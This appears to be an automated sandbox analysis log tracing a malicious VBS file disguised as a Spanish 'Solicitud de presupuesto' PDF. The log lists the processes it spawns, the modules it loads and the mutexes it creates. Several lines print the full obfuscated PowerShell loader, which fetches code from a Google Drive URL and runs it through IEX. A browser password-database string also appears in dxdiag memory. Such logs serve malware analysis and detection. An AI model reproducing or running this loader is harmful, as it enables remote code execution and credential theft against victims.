Source: C:\Windows\SysWOW64\dxdiag.exe Mutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7652:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7372:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wbnz1vi2.yk0.ps1 Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Solicitud de presupuesto 09-30-2024#U00b7pdf.vbs"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7364
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7644
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: dxdiag.exe, 00000019.00000003.1816068285.0000000022EB5000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Solicitud de presupuesto 09-30-2024#U00b7pdf.vbs Virustotal: Detection: 9%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Solicitud de presupuesto 09-30-2024#U00b7pdf.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Inartistical Turkisen Reenforcement #>;$Hollingsworth='Tffelheltene';<#Niveaudelen Ufordjeligheds Initiativriges Honourarily Husbukkens #>;$Husspildevandet=$host.PrivateData;If ($Husspildevandet) {$Antoecians++;}function Dioptres($unjoint){$Curvograph=$Repolarized+$unjoint.Length-$Antoecians;for( $Aftest=5;$Aftest -lt $Curvograph;$Aftest+=6){$Injoint+=$unjoint[$Aftest];}$Injoint;}function Unhandled($Gaggling){ . ($Reprsenterende) ($Gaggling);}$Phoronomy=Dioptres 'nitroMInt,moBergazS,nneiU derlkommalMat iaMac.o/ star5Agend.Korpu0P rfo Sinds(La.ooWReacci SklenNringdBaandoRoun.wGrundsVirke AlpegNUnde TSnoha L,gen1Tekno0 Mass.P.rdo0Tolkd;Insuf FertW twiniFldern Murp6 Skel4Trans;Sygem astox Fo h6Dal e4Agers;.hili Naz erProtevSu.er:Cog i1S aak2vask.1P ani. ambu0Their)sunny ShelGRidseeUrfjecFolkekMaddio En,e/Wheel2Uncli0Ko ce1Skide0Prebl0Zo ia1Firma0benz.1A kom FimreFFahreiDecidrDrifteWind fstrudo,geerxUd.ul/bo,ca1Optra2 Li h1Bortk.Skaml0 Sejr ';$Jordskorpens=Dioptres 'Ph noUGy suS Ba eeRaggeR Beha-FlubbABlowoG Out EDuodeNApo.tTDefin ';$Patienternes=Dioptres ' osethErhvetMora.tCoccopFibrasNdlgn:Mi ti/ Elys/Sk.ggdDiu nrBag jiPre evudfale Knub.Im.ergStiloo FraaoHtt ngLegeml E ekeSolit.SparpcCreamoSalgsm Wind/ FrdiuSi etcNavne?Kni aeIndspxSacchpEctoboSkat,rK nklt Thon=slenddObli.oChirkwCrassnLbeselGlasso B gnaTopkodEnang& ProgiUdskidPluvi=orthi1 SeizETurk 2Varmt2TankrhA rcaSTrkniDCucu.R nelif anrgLImplaSHerpeprubriLRegioTD.scihSuppomUforfHCorr,EMac r9Acco.wTyggejTajikU erebG GorgQDyrticGiese-IntertLagomb Hist9UnvexaMymarxHjtekJArinbLInter ';$Dispowder=Dioptres 'Ruteb> Turo ';$Reprsenterende=Dioptres 'V aleIToldkE VarmXEq,al ';$bytrafik='Konfektionerings';$Peninvariant='\Tallowweed.Kli';Unhandled (Dioptres 'Pneum$Predigpe tal onio KompbAboliaSammelConca:NatteGor.ngeriftmnStr,bd FilaiH ndsgsub etEnchae aurnengrod ybeeFishi=fae y$C ipse H frnAssumvOmb g: Extra ignpPan rptro jd Wis a Helbt Kk,eabehnd+ onse$HoughPMiosie.ruppnSeminiSilvan RimevAffe aMyxoprSiliciGl.veaRntgenMadoqtBienn ');Unhandled (Dioptres ' ale$UrstrgSanitlS kkeo phavbScriba AnaclAmt g:EndurSBinyrtFanera FrafnI oeddNipp s Frere anadSca ae ryde=Mu ke$ ScatPThievaHypogtflippiGoneneBerennQuadrtSetopeViridrExcavnCylineErotisUnhu . Ne bsC.rcepcorralOv rdiFo,est Alko(pa.ro$RavinDC,regiSeps s SlidpDr,bboSpaltw ,arrdOrganeBa ysrUnder)Torch ');Unhandled (Dioptres 'Cross[FouriNHalvdeNonvat Duk,.DemulSB,sieeMediar fllevSweetiOsmancCoe.deCe,toPLyxosoIncooiSkiffnDrg.ttNedslMAttaca BolinNonteaChondgSaussePirrerVrvle]likvi:Germa:PlejeSSa ine PentcAar,tuSeks,rHjerniKirketA atryVarooPShamarRingroEmbrotBestsoP,ckpcSikk.oKl,mrl Slu Unad= lin f rsy[PajamNSandbeNrceitAberr. AvisS UnquekongecFiliouForfarBes,ai Asset Sen yCoaniPForwarUlykkoBubbetenkesoK.strc KopvoIn.eslGang TTransyTha.mp Drate Stam]C ron: Encl:Am siT,indblKonkusLadn.1shops2 Teat ');$Patienternes=$Standsede[0];$Fog
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Inartistical Turkisen Reenforcement #>;$Hollingsworth='Tffelheltene';<#Niveaudelen Ufordjeligheds Initiativriges Honourarily Husbukkens #>;$Husspildevandet=$host.PrivateData;If ($Husspildevandet) {$Antoecians++;}function Dioptres($unjoint){$Curvograph=$Repolarized+$unjoint.Length-$Antoecians;for( $Aftest=5;$Aftest -lt $Curvograph;$Aftest+=6){$Injoint+=$unjoint[$Aftest];}$Injoint;}function Unhandled($Gaggling){ . ($Reprsenterende) ($Gaggling);}$Phoronomy=Dioptres 'nitroMInt,moBergazS,nneiU derlkommalMat iaMac.o/ star5Agend.Korpu0P rfo Sinds(La.ooWReacci SklenNringdBaandoRoun.wGrundsVirke AlpegNUnde TSnoha L,gen1Tekno0 Mass.P.rdo0Tolkd;Insuf FertW twiniFldern Murp6 Skel4Trans;Sygem astox Fo h6Dal e4Agers;.hili Naz erProtevSu.er:Cog i1S aak2vask.1P ani. ambu0Their)sunny ShelGRidseeUrfjecFolkekMaddio En,e/Wheel2Uncli0Ko ce1Skide0Prebl0Zo ia1Firma0benz.1A kom FimreFFahreiDecidrDrifteWind fstrudo,geerxUd.ul/bo,ca1Optra2 Li h1Bortk.Skaml0 Sejr ';$Jordskorpens=Dioptres 'Ph noUGy suS Ba eeRaggeR Beha-FlubbABlowoG Out EDuodeNApo.tTDefin ';$Patienternes=Dioptres ' osethErhvetMora.tCoccopFibrasNdlgn:Mi ti/ Elys/Sk.ggdDiu nrBag jiPre evudfale Knub.Im.ergStiloo FraaoHtt ngLegeml E ekeSolit.SparpcCreamoSalgsm Wind/ FrdiuSi etcNavne?Kni aeIndspxSacchpEctoboSkat,rK nklt Thon=slenddObli.oChirkwCrassnLbeselGlasso B gnaTopkodEnang& ProgiUdskidPluvi=orthi1 SeizETurk 2Varmt2TankrhA rcaSTrkniDCucu.R nelif anrgLImplaSHerpeprubriLRegioTD.scihSuppomUforfHCorr,EMac r9Acco.wTyggejTajikU erebG GorgQDyrticGiese-IntertLagomb Hist9UnvexaMymarxHjtekJArinbLInter ';$Dispowder=Dioptres 'Ruteb> Turo ';$Reprsenterende=Dioptres 'V aleIToldkE VarmXEq,al ';$bytrafik='Konfektionerings';$Peninvariant='\Tallowweed.Kli';Unhandled (Dioptres 'Pneum$Predigpe tal onio KompbAboliaSammelConca:NatteGor.ngeriftmnStr,bd FilaiH ndsgsub etEnchae aurnengrod ybeeFishi=fae y$C ipse H frnAssumvOmb g: Extra ignpPan rptro jd Wis a Helbt Kk,eabehnd+ onse$HoughPMiosie.ruppnSeminiSilvan RimevAffe aMyxoprSiliciGl.veaRntgenMadoqtBienn ');Unhandled (Dioptres ' ale$UrstrgSanitlS kkeo phavbScriba AnaclAmt g:EndurSBinyrtFanera FrafnI oeddNipp s Frere anadSca ae ryde=Mu ke$ ScatPThievaHypogtflippiGoneneBerennQuadrtSetopeViridrExcavnCylineErotisUnhu . Ne bsC.rcepcorralOv rdiFo,est Alko(pa.ro$RavinDC,regiSeps s SlidpDr,bboSpaltw ,arrdOrganeBa ysrUnder)Torch ');Unhandled (Dioptres 'Cross[FouriNHalvdeNonvat Duk,.DemulSB,sieeMediar fllevSweetiOsmancCoe.deCe,toPLyxosoIncooiSkiffnDrg.ttNedslMAttaca BolinNonteaChondgSaussePirrerVrvle]likvi:Germa:PlejeSSa ine PentcAar,tuSeks,rHjerniKirketA atryVarooPShamarRingroEmbrotBestsoP,ckpcSikk.oKl,mrl Slu Unad= lin f rsy[PajamNSandbeNrceitAberr. AvisS UnquekongecFiliouForfarBes,ai Asset Sen yCoaniPForwarUlykkoBubbetenkesoK.strc KopvoIn.eslGang TTransyTha.mp Drate Stam]C ron: Encl:Am siT,indblKonkusLadn.1shops2 Teat ');$Patienternes=$Standsede[0];$Fog
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\syswow64\dxdiag.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Inartistical Turkisen Reenforcement #>;$Hollingsworth='Tffelheltene';<#Niveaudelen Ufordjeligheds Initiativriges Honourarily Husbukkens #>;$Husspildevandet=$host.PrivateData;If ($Husspildevandet) {$Antoecians++;}function Dioptres($unjoint){$Curvograph=$Repolarized+$unjoint.Length-$Antoecians;for( $Aftest=5;$Aftest -lt $Curvograph;$Aftest+=6){$Injoint+=$unjoint[$Aftest];}$Injoint;}function Unhandled($Gaggling){ . ($Reprsenterende) ($Gaggling);}$Phoronomy=Dioptres 'nitroMInt,moBergazS,nneiU derlkommalMat iaMac.o/ star5Agend.Korpu0P rfo Sinds(La.ooWReacci SklenNringdBaandoRoun.wGrundsVirke AlpegNUnde TSnoha L,gen1Tekno0 Mass.P.rdo0Tolkd;Insuf FertW twiniFldern Murp6 Skel4Trans;Sygem astox Fo h6Dal e4Agers;.hili Naz erProtevSu.er:Cog i1S aak2vask.1P ani. ambu0Their)sunny ShelGRidseeUrfjecFolkekMaddio En,e/Wheel2Uncli0Ko ce1Skide0Prebl0Zo ia1Firma0benz.1A kom FimreFFahreiDecidrDrifteWind fstrudo,geerxUd.ul/bo,ca1Optra2 Li h1Bortk.Skaml0 Sejr ';$Jordskorpens=Dioptres 'Ph noUGy suS Ba eeRaggeR Beha-FlubbABlowoG Out EDuodeNApo.tTDefin ';$Patienternes=Dioptres ' osethErhvetMora.tCoccopFibrasNdlgn:Mi ti/ Elys/Sk.ggdDiu nrBag jiPre evudfale Knub.Im.ergStiloo FraaoHtt ngLegeml E ekeSolit.SparpcCreamoSalgsm Wind/ FrdiuSi etcNavne?Kni aeIndspxSacchpEctoboSkat,rK nklt Thon=slenddObli.oChirkwCrassnLbeselGlasso B gnaTopkodEnang& ProgiUdskidPluvi=orthi1 SeizETurk 2Varmt2TankrhA rcaSTrkniDCucu.R nelif anrgLImplaSHerpeprubriLRegioTD.scihSuppomUforfHCorr,EMac r9Acco.wTyggejTajikU erebG GorgQDyrticGiese-IntertLagomb Hist9UnvexaMymarxHjtekJArinbLInter ';$Dispowder=Dioptres 'Ruteb> Turo ';$Reprsenterende=Dioptres 'V aleIToldkE VarmXEq,al ';$bytrafik='Konfektionerings';$Peninvariant='\Tallowweed.Kli';Unhandled (Dioptres 'Pneum$Predigpe tal onio KompbAboliaSammelConca:NatteGor.ngeriftmnStr,bd FilaiH ndsgsub etEnchae aurnengrod ybeeFishi=fae y$C ipse H frnAssumvOmb g: Extra ignpPan rptro jd Wis a Helbt Kk,eabehnd+ onse$HoughPMiosie.ruppnSeminiSilvan RimevAffe aMyxoprSiliciGl.veaRntgenMadoqtBienn ');Unhandled (Dioptres ' ale$UrstrgSanitlS kkeo phavbScriba AnaclAmt g:EndurSBinyrtFanera FrafnI oeddNipp s Frere anadSca ae ryde=Mu ke$ ScatPThievaHypogtflippiGoneneBerennQuadrtSetopeViridrExcavnCylineErotisUnhu . Ne bsC.rcepcorralOv rdiFo,est Alko(pa.ro$RavinDC,regiSeps s SlidpDr,bboSpaltw ,arrdOrganeBa ysrUnder)Torch ');Unhandled (Dioptres 'Cross[FouriNHalvdeNonvat Duk,.DemulSB,sieeMediar fllevSweetiOsmancCoe.deCe,toPLyxosoIncooiSkiffnDrg.ttNedslMAttaca BolinNonteaChondgSaussePirrerVrvle]likvi:Germa:PlejeSSa ine PentcAar,tuSeks,rHjerniKirketA atryVarooPShamarRingroEmbrotBestsoP,ckpcSikk.oKl,mrl Slu Unad= lin f rsy[PajamNSandbeNrceitAberr. AvisS UnquekongecFiliouForfarBes,ai Asset Sen yCoaniPForwarUlykkoBubbetenkesoK.strc KopvoIn.eslGang TTransyTha.mp Drate Stam]C ron: Encl:Am siT,indblKonkusLadn.1shops2 Teat ');$Patienternes=$Standsede[0];$Fog Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\syswow64\dxdiag.exe" Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
